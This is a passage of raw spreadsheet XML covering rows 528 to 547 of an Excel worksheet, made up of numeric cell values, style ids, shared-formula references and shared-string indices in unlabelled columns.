        <f t="shared" si="1"/>
        <v>0.942927663</v>
      </c>
      <c r="B528" s="29">
        <v>1.0</v>
      </c>
      <c r="C528" s="29">
        <v>127974.0</v>
      </c>
      <c r="D528" s="14"/>
      <c r="E528" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F528" s="14"/>
      <c r="G528" s="29">
        <v>3.0</v>
      </c>
      <c r="H528" s="29">
        <v>3967.0</v>
      </c>
      <c r="I528" s="29">
        <v>106817.0</v>
      </c>
      <c r="J528" s="15"/>
      <c r="K528" s="29">
        <v>106817.0</v>
      </c>
      <c r="L528" s="15"/>
      <c r="M528" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N528" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O528" s="29">
        <v>2.0</v>
      </c>
      <c r="P528" s="29">
        <v>7.0</v>
      </c>
      <c r="Q528" s="15"/>
      <c r="R528" s="15"/>
      <c r="S528" s="15"/>
      <c r="T528" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U528" s="5"/>
      <c r="V528" s="5"/>
      <c r="W528" s="47"/>
      <c r="X528" s="45"/>
      <c r="Y528" s="45"/>
      <c r="Z528" s="38" t="s">
        <v>2626</v>
      </c>
      <c r="AA528" s="39" t="s">
        <v>2627</v>
      </c>
      <c r="AB528" s="38" t="s">
        <v>2628</v>
      </c>
      <c r="AC528" s="40">
        <v>127880.0</v>
      </c>
      <c r="AD528" s="5"/>
      <c r="AE528" s="14"/>
      <c r="AF528" s="14"/>
    </row>
    <row r="529">
      <c r="A529" s="6">
        <f t="shared" si="1"/>
        <v>0.5539380595</v>
      </c>
      <c r="B529" s="29">
        <v>1.0</v>
      </c>
      <c r="C529" s="15"/>
      <c r="D529" s="14"/>
      <c r="E529" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F529" s="14"/>
      <c r="G529" s="29">
        <v>1.0</v>
      </c>
      <c r="H529" s="29">
        <v>223.0</v>
      </c>
      <c r="I529" s="29">
        <v>87468.0</v>
      </c>
      <c r="J529" s="15"/>
      <c r="K529" s="29">
        <v>91879.0</v>
      </c>
      <c r="L529" s="15"/>
      <c r="M529" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N529" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O529" s="29">
        <v>1.0</v>
      </c>
      <c r="P529" s="29">
        <v>7.0</v>
      </c>
      <c r="Q529" s="15"/>
      <c r="R529" s="15"/>
      <c r="S529" s="15"/>
      <c r="T529" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U529" s="5"/>
      <c r="V529" s="5"/>
      <c r="W529" s="47"/>
      <c r="X529" s="45"/>
      <c r="Y529" s="45"/>
      <c r="Z529" s="38" t="s">
        <v>2629</v>
      </c>
      <c r="AA529" s="39" t="s">
        <v>2630</v>
      </c>
      <c r="AB529" s="38" t="s">
        <v>2631</v>
      </c>
      <c r="AC529" s="40">
        <v>217932.0</v>
      </c>
      <c r="AD529" s="5"/>
      <c r="AE529" s="14"/>
      <c r="AF529" s="14"/>
    </row>
    <row r="530">
      <c r="A530" s="6">
        <f t="shared" si="1"/>
        <v>0.8544644498</v>
      </c>
      <c r="B530" s="29">
        <v>1.0</v>
      </c>
      <c r="C530" s="29">
        <v>254109.0</v>
      </c>
      <c r="D530" s="14"/>
      <c r="E530" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F530" s="14"/>
      <c r="G530" s="29">
        <v>24.0</v>
      </c>
      <c r="H530" s="29">
        <v>4284.0</v>
      </c>
      <c r="I530" s="29">
        <v>264343.0</v>
      </c>
      <c r="J530" s="15"/>
      <c r="K530" s="29">
        <v>264343.0</v>
      </c>
      <c r="L530" s="15"/>
      <c r="M530" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N530" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O530" s="29">
        <v>3.0</v>
      </c>
      <c r="P530" s="29">
        <v>1.0</v>
      </c>
      <c r="Q530" s="15"/>
      <c r="R530" s="15"/>
      <c r="S530" s="15"/>
      <c r="T530" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U530" s="5"/>
      <c r="V530" s="5"/>
      <c r="W530" s="47"/>
      <c r="X530" s="45"/>
      <c r="Y530" s="45"/>
      <c r="Z530" s="38" t="s">
        <v>2632</v>
      </c>
      <c r="AA530" s="39" t="s">
        <v>2633</v>
      </c>
      <c r="AB530" s="38" t="s">
        <v>2634</v>
      </c>
      <c r="AC530" s="40">
        <v>254101.0</v>
      </c>
      <c r="AD530" s="5"/>
      <c r="AE530" s="14"/>
      <c r="AF530" s="14"/>
    </row>
    <row r="531">
      <c r="A531" s="6">
        <f t="shared" si="1"/>
        <v>0.2447282266</v>
      </c>
      <c r="B531" s="29">
        <v>1.0</v>
      </c>
      <c r="C531" s="14"/>
      <c r="D531" s="14"/>
      <c r="E531" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F531" s="14"/>
      <c r="G531" s="29">
        <v>5.0</v>
      </c>
      <c r="H531" s="29">
        <v>1035.0</v>
      </c>
      <c r="I531" s="29">
        <v>3253.0</v>
      </c>
      <c r="J531" s="15"/>
      <c r="K531" s="29">
        <v>86652.0</v>
      </c>
      <c r="L531" s="15"/>
      <c r="M531" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N531" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O531" s="29">
        <v>1.0</v>
      </c>
      <c r="P531" s="29">
        <v>4.0</v>
      </c>
      <c r="Q531" s="15"/>
      <c r="R531" s="15"/>
      <c r="S531" s="15"/>
      <c r="T531" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U531" s="5"/>
      <c r="V531" s="5"/>
      <c r="W531" s="47"/>
      <c r="X531" s="45"/>
      <c r="Y531" s="45"/>
      <c r="Z531" s="38" t="s">
        <v>2635</v>
      </c>
      <c r="AA531" s="39" t="s">
        <v>2636</v>
      </c>
      <c r="AB531" s="38" t="s">
        <v>1562</v>
      </c>
      <c r="AC531" s="40">
        <v>128753.0</v>
      </c>
      <c r="AD531" s="5"/>
      <c r="AE531" s="14"/>
      <c r="AF531" s="14"/>
    </row>
    <row r="532">
      <c r="A532" s="6">
        <f t="shared" si="1"/>
        <v>0.5119906965</v>
      </c>
      <c r="B532" s="29">
        <v>1.0</v>
      </c>
      <c r="C532" s="29">
        <v>230785.0</v>
      </c>
      <c r="D532" s="14"/>
      <c r="E532" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F532" s="14"/>
      <c r="G532" s="29">
        <v>-2.0</v>
      </c>
      <c r="H532" s="29">
        <v>166.0</v>
      </c>
      <c r="I532" s="29">
        <v>221458.0</v>
      </c>
      <c r="J532" s="15"/>
      <c r="K532" s="29">
        <v>6253.0</v>
      </c>
      <c r="L532" s="15"/>
      <c r="M532" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N532" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O532" s="29">
        <v>2.0</v>
      </c>
      <c r="P532" s="29">
        <v>0.0</v>
      </c>
      <c r="Q532" s="15"/>
      <c r="R532" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S532" s="15"/>
      <c r="T532" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U532" s="5"/>
      <c r="V532" s="5"/>
      <c r="W532" s="47"/>
      <c r="X532" s="45"/>
      <c r="Y532" s="45"/>
      <c r="Z532" s="38" t="s">
        <v>2637</v>
      </c>
      <c r="AA532" s="39" t="s">
        <v>2638</v>
      </c>
      <c r="AB532" s="38" t="s">
        <v>2639</v>
      </c>
      <c r="AC532" s="40">
        <v>230771.0</v>
      </c>
      <c r="AD532" s="5"/>
      <c r="AE532" s="14"/>
      <c r="AF532" s="14"/>
    </row>
    <row r="533">
      <c r="A533" s="6">
        <f t="shared" si="1"/>
        <v>0.234982158</v>
      </c>
      <c r="B533" s="29">
        <v>1.0</v>
      </c>
      <c r="C533" s="15"/>
      <c r="D533" s="14"/>
      <c r="E533" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F533" s="14"/>
      <c r="G533" s="29">
        <v>4.0</v>
      </c>
      <c r="H533" s="29">
        <v>407.0</v>
      </c>
      <c r="I533" s="29">
        <v>35724.0</v>
      </c>
      <c r="J533" s="15"/>
      <c r="K533" s="29">
        <v>139477.0</v>
      </c>
      <c r="L533" s="15"/>
      <c r="M533" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N533" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O533" s="29">
        <v>4.0</v>
      </c>
      <c r="P533" s="29">
        <v>4.0</v>
      </c>
      <c r="Q533" s="15"/>
      <c r="R533" s="15"/>
      <c r="S533" s="15"/>
      <c r="T533" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U533" s="5"/>
      <c r="V533" s="5"/>
      <c r="W533" s="47"/>
      <c r="X533" s="45"/>
      <c r="Y533" s="45"/>
      <c r="Z533" s="38" t="s">
        <v>2640</v>
      </c>
      <c r="AA533" s="39" t="s">
        <v>2641</v>
      </c>
      <c r="AB533" s="38" t="s">
        <v>2642</v>
      </c>
      <c r="AC533" s="40">
        <v>145103.0</v>
      </c>
      <c r="AD533" s="5"/>
      <c r="AE533" s="14"/>
      <c r="AF533" s="14"/>
    </row>
    <row r="534">
      <c r="A534" s="6">
        <f t="shared" si="1"/>
        <v>0.1390598206</v>
      </c>
      <c r="B534" s="29">
        <v>1.0</v>
      </c>
      <c r="C534" s="15"/>
      <c r="D534" s="14"/>
      <c r="E534" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F534" s="14"/>
      <c r="G534" s="29">
        <v>2.0</v>
      </c>
      <c r="H534" s="29">
        <v>202.0</v>
      </c>
      <c r="I534" s="29">
        <v>21120.0</v>
      </c>
      <c r="J534" s="15"/>
      <c r="K534" s="15"/>
      <c r="L534" s="15"/>
      <c r="M534" s="15"/>
      <c r="N534" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O534" s="29">
        <v>1.0</v>
      </c>
      <c r="P534" s="29">
        <v>0.0</v>
      </c>
      <c r="Q534" s="15"/>
      <c r="R534" s="15"/>
      <c r="S534" s="15"/>
      <c r="T534" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U534" s="5"/>
      <c r="V534" s="5"/>
      <c r="W534" s="47"/>
      <c r="X534" s="45"/>
      <c r="Y534" s="45"/>
      <c r="Z534" s="38" t="s">
        <v>2643</v>
      </c>
      <c r="AA534" s="39" t="s">
        <v>2644</v>
      </c>
      <c r="AB534" s="38" t="s">
        <v>2645</v>
      </c>
      <c r="AC534" s="40">
        <v>242984.0</v>
      </c>
      <c r="AD534" s="5"/>
      <c r="AE534" s="14"/>
      <c r="AF534" s="14"/>
    </row>
    <row r="535">
      <c r="A535" s="6">
        <f t="shared" si="1"/>
        <v>0.8643004638</v>
      </c>
      <c r="B535" s="29">
        <v>1.0</v>
      </c>
      <c r="C535" s="15"/>
      <c r="D535" s="14"/>
      <c r="E535" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F535" s="14"/>
      <c r="G535" s="29">
        <v>8.0</v>
      </c>
      <c r="H535" s="29">
        <v>2574.0</v>
      </c>
      <c r="I535" s="29">
        <v>8676.0</v>
      </c>
      <c r="J535" s="15"/>
      <c r="K535" s="15"/>
      <c r="L535" s="15"/>
      <c r="M535" s="14"/>
      <c r="N535" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O535" s="29">
        <v>3.0</v>
      </c>
      <c r="P535" s="29">
        <v>0.0</v>
      </c>
      <c r="Q535" s="15"/>
      <c r="R535" s="15"/>
      <c r="S535" s="15"/>
      <c r="T535" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U535" s="5"/>
      <c r="V535" s="5"/>
      <c r="W535" s="47"/>
      <c r="X535" s="45"/>
      <c r="Y535" s="45"/>
      <c r="Z535" s="38" t="s">
        <v>2646</v>
      </c>
      <c r="AA535" s="39" t="s">
        <v>2647</v>
      </c>
      <c r="AB535" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC535" s="40">
        <v>16876.0</v>
      </c>
      <c r="AD535" s="5"/>
      <c r="AE535" s="14"/>
      <c r="AF535" s="14"/>
    </row>
    <row r="536">
      <c r="A536" s="6">
        <f t="shared" si="1"/>
        <v>0.576512136</v>
      </c>
      <c r="B536" s="29">
        <v>1.0</v>
      </c>
      <c r="C536" s="29">
        <v>4312.0</v>
      </c>
      <c r="D536" s="14"/>
      <c r="E536" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F536" s="14"/>
      <c r="G536" s="29">
        <v>2.0</v>
      </c>
      <c r="H536" s="29">
        <v>474.0</v>
      </c>
      <c r="I536" s="29">
        <v>2666.0</v>
      </c>
      <c r="J536" s="15"/>
      <c r="K536" s="29">
        <v>2666.0</v>
      </c>
      <c r="L536" s="15"/>
      <c r="M536" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N536" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O536" s="29">
        <v>1.0</v>
      </c>
      <c r="P536" s="29">
        <v>7.0</v>
      </c>
      <c r="Q536" s="15"/>
      <c r="R536" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S536" s="15"/>
      <c r="T536" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U536" s="5"/>
      <c r="V536" s="5"/>
      <c r="W536" s="45"/>
      <c r="X536" s="45"/>
      <c r="Y536" s="45"/>
      <c r="Z536" s="38" t="s">
        <v>2648</v>
      </c>
      <c r="AA536" s="39" t="s">
        <v>2649</v>
      </c>
      <c r="AB536" s="38" t="s">
        <v>2650</v>
      </c>
      <c r="AC536" s="40">
        <v>4309.0</v>
      </c>
      <c r="AD536" s="5"/>
      <c r="AE536" s="14"/>
      <c r="AF536" s="14"/>
    </row>
    <row r="537">
      <c r="A537" s="6">
        <f t="shared" si="1"/>
        <v>0.8267175439</v>
      </c>
      <c r="B537" s="29">
        <v>1.0</v>
      </c>
      <c r="C537" s="15"/>
      <c r="D537" s="14"/>
      <c r="E537" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F537" s="14"/>
      <c r="G537" s="29">
        <v>2.0</v>
      </c>
      <c r="H537" s="29">
        <v>510.0</v>
      </c>
      <c r="I537" s="29">
        <v>232855.0</v>
      </c>
      <c r="J537" s="15"/>
      <c r="K537" s="15"/>
      <c r="L537" s="15"/>
      <c r="M537" s="14"/>
      <c r="N537" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O537" s="29">
        <v>2.0</v>
      </c>
      <c r="P537" s="29">
        <v>0.0</v>
      </c>
      <c r="Q537" s="15"/>
      <c r="R537" s="15"/>
      <c r="S537" s="15"/>
      <c r="T537" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U537" s="5"/>
      <c r="V537" s="5"/>
      <c r="W537" s="47"/>
      <c r="X537" s="45"/>
      <c r="Y537" s="45"/>
      <c r="Z537" s="38" t="s">
        <v>2651</v>
      </c>
      <c r="AA537" s="39" t="s">
        <v>2652</v>
      </c>
      <c r="AB537" s="38" t="s">
        <v>2653</v>
      </c>
      <c r="AC537" s="40">
        <v>230711.0</v>
      </c>
      <c r="AD537" s="5"/>
      <c r="AE537" s="14"/>
      <c r="AF537" s="14"/>
    </row>
    <row r="538">
      <c r="A538" s="6">
        <f t="shared" si="1"/>
        <v>0.5460500216</v>
      </c>
      <c r="B538" s="29">
        <v>1.0</v>
      </c>
      <c r="C538" s="29">
        <v>197480.0</v>
      </c>
      <c r="D538" s="14"/>
      <c r="E538" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F538" s="14"/>
      <c r="G538" s="29">
        <v>3.0</v>
      </c>
      <c r="H538" s="29">
        <v>1158.0</v>
      </c>
      <c r="I538" s="29">
        <v>47057.0</v>
      </c>
      <c r="J538" s="15"/>
      <c r="K538" s="15"/>
      <c r="L538" s="15"/>
      <c r="M538" s="15"/>
      <c r="N538" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O538" s="29">
        <v>3.0</v>
      </c>
      <c r="P538" s="29">
        <v>1.0</v>
      </c>
      <c r="Q538" s="15"/>
      <c r="R538" s="15"/>
      <c r="S538" s="15"/>
      <c r="T538" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U538" s="5"/>
      <c r="V538" s="5"/>
      <c r="W538" s="47"/>
      <c r="X538" s="45"/>
      <c r="Y538" s="45"/>
      <c r="Z538" s="38" t="s">
        <v>2654</v>
      </c>
      <c r="AA538" s="39" t="s">
        <v>2655</v>
      </c>
      <c r="AB538" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC538" s="40">
        <v>197470.0</v>
      </c>
      <c r="AD538" s="5"/>
      <c r="AE538" s="14"/>
      <c r="AF538" s="14"/>
    </row>
    <row r="539">
      <c r="A539" s="6">
        <f t="shared" si="1"/>
        <v>0.3070107077</v>
      </c>
      <c r="B539" s="29">
        <v>1.0</v>
      </c>
      <c r="C539" s="14"/>
      <c r="D539" s="14"/>
      <c r="E539" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F539" s="14"/>
      <c r="G539" s="29">
        <v>0.0</v>
      </c>
      <c r="H539" s="29">
        <v>671.0</v>
      </c>
      <c r="I539" s="29">
        <v>91568.0</v>
      </c>
      <c r="J539" s="15"/>
      <c r="K539" s="29">
        <v>52676.0</v>
      </c>
      <c r="L539" s="15"/>
      <c r="M539" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N539" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O539" s="29">
        <v>4.0</v>
      </c>
      <c r="P539" s="29">
        <v>13.0</v>
      </c>
      <c r="Q539" s="15"/>
      <c r="R539" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S539" s="15"/>
      <c r="T539" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U539" s="5"/>
      <c r="V539" s="5"/>
      <c r="W539" s="47"/>
      <c r="X539" s="45"/>
      <c r="Y539" s="45"/>
      <c r="Z539" s="38" t="s">
        <v>2656</v>
      </c>
      <c r="AA539" s="39" t="s">
        <v>2657</v>
      </c>
      <c r="AB539" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC539" s="40">
        <v>105120.0</v>
      </c>
      <c r="AD539" s="5"/>
      <c r="AE539" s="14"/>
      <c r="AF539" s="14"/>
    </row>
    <row r="540">
      <c r="A540" s="6">
        <f t="shared" si="1"/>
        <v>0.3573172811</v>
      </c>
      <c r="B540" s="29">
        <v>1.0</v>
      </c>
      <c r="C540" s="15"/>
      <c r="D540" s="14"/>
      <c r="E540" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F540" s="14"/>
      <c r="G540" s="29">
        <v>1.0</v>
      </c>
      <c r="H540" s="29">
        <v>536.0</v>
      </c>
      <c r="I540" s="29">
        <v>44444.0</v>
      </c>
      <c r="J540" s="15"/>
      <c r="K540" s="29">
        <v>12.0</v>
      </c>
      <c r="L540" s="15"/>
      <c r="M540" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N540" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O540" s="29">
        <v>3.0</v>
      </c>
      <c r="P540" s="29">
        <v>3.0</v>
      </c>
      <c r="Q540" s="15"/>
      <c r="R540" s="15"/>
      <c r="S540" s="15"/>
      <c r="T540" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U540" s="5"/>
      <c r="V540" s="5"/>
      <c r="W540" s="47"/>
      <c r="X540" s="45"/>
      <c r="Y540" s="45"/>
      <c r="Z540" s="38" t="s">
        <v>2658</v>
      </c>
      <c r="AA540" s="39" t="s">
        <v>2659</v>
      </c>
      <c r="AB540" s="38" t="s">
        <v>2660</v>
      </c>
      <c r="AC540" s="40">
        <v>145381.0</v>
      </c>
      <c r="AD540" s="5"/>
      <c r="AE540" s="14"/>
      <c r="AF540" s="14"/>
    </row>
    <row r="541">
      <c r="A541" s="6">
        <f t="shared" si="1"/>
        <v>0.9001653296</v>
      </c>
      <c r="B541" s="29">
        <v>1.0</v>
      </c>
      <c r="C541" s="15"/>
      <c r="D541" s="14"/>
      <c r="E541" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F541" s="14"/>
      <c r="G541" s="29">
        <v>53.0</v>
      </c>
      <c r="H541" s="29">
        <v>6061.0</v>
      </c>
      <c r="I541" s="29">
        <v>2570.0</v>
      </c>
      <c r="J541" s="15"/>
      <c r="K541" s="29">
        <v>618.0</v>
      </c>
      <c r="L541" s="15"/>
      <c r="M541" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N541" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O541" s="29">
        <v>10.0</v>
      </c>
      <c r="P541" s="29">
        <v>9.0</v>
      </c>
      <c r="Q541" s="15"/>
      <c r="R541" s="15"/>
      <c r="S541" s="15"/>
      <c r="T541" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U541" s="5"/>
      <c r="V541" s="5"/>
      <c r="W541" s="45"/>
      <c r="X541" s="45"/>
      <c r="Y541" s="45"/>
      <c r="Z541" s="38" t="s">
        <v>2661</v>
      </c>
      <c r="AA541" s="39" t="s">
        <v>2662</v>
      </c>
      <c r="AB541" s="38" t="s">
        <v>2663</v>
      </c>
      <c r="AC541" s="40">
        <v>4032.0</v>
      </c>
      <c r="AD541" s="5"/>
      <c r="AE541" s="14"/>
      <c r="AF541" s="14"/>
    </row>
    <row r="542">
      <c r="A542" s="6">
        <f t="shared" si="1"/>
        <v>0.319925496</v>
      </c>
      <c r="B542" s="29">
        <v>1.0</v>
      </c>
      <c r="C542" s="29">
        <v>240100.0</v>
      </c>
      <c r="D542" s="14"/>
      <c r="E542" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F542" s="14"/>
      <c r="G542" s="29">
        <v>10.0</v>
      </c>
      <c r="H542" s="29">
        <v>3254.0</v>
      </c>
      <c r="I542" s="29">
        <v>86361.0</v>
      </c>
      <c r="J542" s="15"/>
      <c r="K542" s="29">
        <v>86361.0</v>
      </c>
      <c r="L542" s="15"/>
      <c r="M542" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N542" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O542" s="29">
        <v>5.0</v>
      </c>
      <c r="P542" s="29">
        <v>3.0</v>
      </c>
      <c r="Q542" s="15"/>
      <c r="R542" s="15"/>
      <c r="S542" s="15"/>
      <c r="T542" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U542" s="5"/>
      <c r="V542" s="5"/>
      <c r="W542" s="47"/>
      <c r="X542" s="45"/>
      <c r="Y542" s="45"/>
      <c r="Z542" s="38" t="s">
        <v>2664</v>
      </c>
      <c r="AA542" s="39" t="s">
        <v>2665</v>
      </c>
      <c r="AB542" s="38" t="s">
        <v>2666</v>
      </c>
      <c r="AC542" s="40">
        <v>240098.0</v>
      </c>
      <c r="AD542" s="5"/>
      <c r="AE542" s="14"/>
      <c r="AF542" s="14"/>
    </row>
    <row r="543">
      <c r="A543" s="6">
        <f t="shared" si="1"/>
        <v>0.5580533583</v>
      </c>
      <c r="B543" s="29">
        <v>1.0</v>
      </c>
      <c r="C543" s="29">
        <v>152056.0</v>
      </c>
      <c r="D543" s="14"/>
      <c r="E543" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F543" s="14"/>
      <c r="G543" s="29">
        <v>1.0</v>
      </c>
      <c r="H543" s="29">
        <v>300.0</v>
      </c>
      <c r="I543" s="29">
        <v>140146.0</v>
      </c>
      <c r="J543" s="15"/>
      <c r="K543" s="15"/>
      <c r="L543" s="15"/>
      <c r="M543" s="14"/>
      <c r="N543" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O543" s="29">
        <v>2.0</v>
      </c>
      <c r="P543" s="29">
        <v>0.0</v>
      </c>
      <c r="Q543" s="15"/>
      <c r="R543" s="15"/>
      <c r="S543" s="15"/>
      <c r="T543" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U543" s="5"/>
      <c r="V543" s="5"/>
      <c r="W543" s="47"/>
      <c r="X543" s="45"/>
      <c r="Y543" s="45"/>
      <c r="Z543" s="38" t="s">
        <v>2667</v>
      </c>
      <c r="AA543" s="39" t="s">
        <v>2668</v>
      </c>
      <c r="AB543" s="38" t="s">
        <v>1296</v>
      </c>
      <c r="AC543" s="40">
        <v>152052.0</v>
      </c>
      <c r="AD543" s="5"/>
      <c r="AE543" s="14"/>
      <c r="AF543" s="14"/>
    </row>
    <row r="544">
      <c r="A544" s="6">
        <f t="shared" si="1"/>
        <v>0.772172578</v>
      </c>
      <c r="B544" s="29">
        <v>1.0</v>
      </c>
      <c r="C544" s="29">
        <v>140296.0</v>
      </c>
      <c r="D544" s="14"/>
      <c r="E544" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F544" s="14"/>
      <c r="G544" s="29">
        <v>0.0</v>
      </c>
      <c r="H544" s="29">
        <v>69.0</v>
      </c>
      <c r="I544" s="29">
        <v>125927.0</v>
      </c>
      <c r="J544" s="15"/>
      <c r="K544" s="15"/>
      <c r="L544" s="15"/>
      <c r="M544" s="15"/>
      <c r="N544" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O544" s="29">
        <v>1.0</v>
      </c>
      <c r="P544" s="29">
        <v>2.0</v>
      </c>
      <c r="Q544" s="15"/>
      <c r="R544" s="15"/>
      <c r="S544" s="15"/>
      <c r="T544" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U544" s="5"/>
      <c r="V544" s="5"/>
      <c r="W544" s="47"/>
      <c r="X544" s="45"/>
      <c r="Y544" s="45"/>
      <c r="Z544" s="38" t="s">
        <v>2669</v>
      </c>
      <c r="AA544" s="39" t="s">
        <v>2670</v>
      </c>
      <c r="AB544" s="38" t="s">
        <v>2671</v>
      </c>
      <c r="AC544" s="40">
        <v>140283.0</v>
      </c>
      <c r="AD544" s="5"/>
      <c r="AE544" s="14"/>
      <c r="AF544" s="14"/>
    </row>
    <row r="545">
      <c r="A545" s="6">
        <f t="shared" si="1"/>
        <v>0.8645753563</v>
      </c>
      <c r="B545" s="29">
        <v>1.0</v>
      </c>
      <c r="C545" s="15"/>
      <c r="D545" s="14"/>
      <c r="E545" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F545" s="14"/>
      <c r="G545" s="29">
        <v>0.0</v>
      </c>
      <c r="H545" s="29">
        <v>15.0</v>
      </c>
      <c r="I545" s="29">
        <v>275454.0</v>
      </c>
      <c r="J545" s="15"/>
      <c r="K545" s="15"/>
      <c r="L545" s="15"/>
      <c r="M545" s="14"/>
      <c r="N545" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O545" s="29">
        <v>0.0</v>
      </c>
      <c r="P545" s="29">
        <v>1.0</v>
      </c>
      <c r="Q545" s="15"/>
      <c r="R545" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S545" s="15"/>
      <c r="T545" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U545" s="5"/>
      <c r="V545" s="5"/>
      <c r="W545" s="47"/>
      <c r="X545" s="45"/>
      <c r="Y545" s="45"/>
      <c r="Z545" s="38" t="s">
        <v>2672</v>
      </c>
      <c r="AA545" s="39" t="s">
        <v>2673</v>
      </c>
      <c r="AB545" s="38" t="s">
        <v>2674</v>
      </c>
      <c r="AC545" s="40">
        <v>270762.0</v>
      </c>
      <c r="AD545" s="5"/>
      <c r="AE545" s="14"/>
      <c r="AF545" s="14"/>
    </row>
    <row r="546">
      <c r="A546" s="6">
        <f t="shared" si="1"/>
        <v>0.05955881511</v>
      </c>
      <c r="B546" s="29">
        <v>1.0</v>
      </c>
      <c r="C546" s="29">
        <v>257306.0</v>
      </c>
      <c r="D546" s="14"/>
      <c r="E546" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F546" s="14"/>
      <c r="G546" s="29">
        <v>0.0</v>
      </c>
      <c r="H546" s="29">
        <v>99.0</v>
      </c>
      <c r="I546" s="29">
        <v>270345.0</v>
      </c>
      <c r="J546" s="15"/>
      <c r="K546" s="29">
        <v>235964.0</v>
      </c>
      <c r="L546" s="15"/>
      <c r="M546" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N546" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O546" s="29">
        <v>1.0</v>
      </c>
      <c r="P546" s="29">
        <v>1.0</v>
      </c>
      <c r="Q546" s="15"/>
      <c r="R546" s="15"/>
      <c r="S546" s="15"/>
      <c r="T546" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U546" s="5"/>
      <c r="V546" s="5"/>
      <c r="W546" s="47"/>
      <c r="X546" s="45"/>
      <c r="Y546" s="45"/>
      <c r="Z546" s="38" t="s">
        <v>2675</v>
      </c>
      <c r="AA546" s="39" t="s">
        <v>2676</v>
      </c>
      <c r="AB546" s="38" t="s">
        <v>2677</v>
      </c>
      <c r="AC546" s="40">
        <v>257299.0</v>
      </c>
      <c r="AD546" s="5"/>
      <c r="AE546" s="14"/>
      <c r="AF546" s="14"/>
    </row>
    <row r="547">
      <c r="A547" s="6">
        <f t="shared" si="1"/>
        <v>0.864959641</v>
      </c>
      <c r="B547" s="29">
        <v>1.0</v>
      </c>
      <c r="C547" s="29">
        <v>149832.0</v>
      </c>
      <c r="D547" s="14"/>
      <c r="E547" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F547" s="14"/>
      <c r="G547" s="29">
        <v>0.0</v>
      </c>
      <c r="H547" s="29">
        <v>8525.0</v>
      </c>
      <c r="I547" s="29">
        <v>137763.0</v>
      </c>
      <c r="J547" s="15"/>
      <c r="K547" s="29">
        <v>98538.0</v>
      </c>
      <c r="L547" s="15"/>
      <c r="M547" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N547" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O547" s="29">
        <v>2.0</v>
      </c>
      <c r="P547" s="29">
        <v>0.0</v>
      </c>
      <c r="Q547" s="15"/>
      <c r="R547" s="15"/>
      <c r="S547" s="15"/>
      <c r="T547" s="5" t="s">
        <v>37</v>
      </c>
